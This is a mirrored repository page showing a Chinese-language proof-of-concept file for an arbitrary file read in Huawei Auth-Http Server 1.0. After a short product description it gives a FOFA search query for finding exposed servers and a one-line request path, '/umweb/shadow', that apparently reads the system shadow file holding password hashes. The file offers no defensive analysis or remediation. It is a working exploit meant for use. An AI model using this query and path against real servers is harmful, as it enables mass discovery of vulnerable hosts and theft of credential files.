admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/华为Auth-Http Serve/华为Auth-Http Serve任意文件读取.md

15 lines
653 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
## 华为Auth-Http Serve任意文件读取
华为Auth-Http服务,华为Auth-Http Server是一款安全认证服务器在提供安全的远程登录和网络资源访问控制。支持多种认证方式和协议AAA、Radius、TACACS+等可以实现用户身份认证、授权和审计等功能。同时可广泛应用于企业、政府、教育等行业的安全架构中。华为Auth-Http Server 1.0任意文件读取,攻击者可通过该漏洞读取任意文件
## fofa
```
server="Huawei Auth-Http Server 1.0"
```
## POC
```
/umweb/shadow
```
![image](https://github.com/wy876/POC/assets/139549762/6e52e737-0076-4630-9d6f-a9f0a355b549)
Reference in New Issue Copy Permalink